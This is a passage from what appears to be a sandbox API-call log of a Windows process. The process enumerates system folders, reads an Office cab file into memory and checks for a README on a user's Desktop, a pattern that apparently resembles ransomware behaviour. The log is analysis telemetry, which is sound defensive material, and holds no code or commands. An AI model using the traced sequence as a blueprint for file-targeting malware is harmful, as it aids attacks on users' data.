ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.588] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.588] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.588] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.588] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0154.588] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0154.588] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.588] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.588] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.588] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.588] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.589] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0154.589] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0154.589] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.589] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.589] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0154.589] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0154.589] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.590] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.591] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0154.591] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0154.591] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.591] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.591] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0154.591] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0154.591] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.591] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.592] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0154.592] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0154.592] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.592] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.592] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0154.592] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0154.592] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.592] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.593] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0154.593] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0154.593] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.593] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.593] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0154.593] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings\\", lpFilePart=0x0) returned 0x1a [0154.593] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0154.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee87c) returned 1 [0154.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.594] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0154.594] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0154.594] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.595] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.595] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0154.595] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0154.595] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.595] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.595] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0154.595] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0154.595] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.599] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.600] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0154.600] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0154.600] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.601] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0154.601] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0154.601] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0154.601] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.603] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0154.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0154.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0154.603] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0154.603] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0154.603] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.603] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0154.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0154.604] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0154.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0154.604] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.604] GetFileType (hFile=0x4d0) returned 0x1 [0154.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0154.604] GetFileType (hFile=0x4d0) returned 0x1 [0154.605] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x102fcbb [0154.643] ReadFile (in: hFile=0x4d0, lpBuffer=0x9551018, nNumberOfBytesToRead=0x102fcbb, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x9551018*, lpNumberOfBytesRead=0x2ee7d4*=0x102fcbb, lpOverlapped=0x0) returned 1 [0157.895] CloseHandle (hObject=0x4d0) returned 1 [0159.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0159.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0159.419] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0159.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0159.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0159.420] CreateFileW 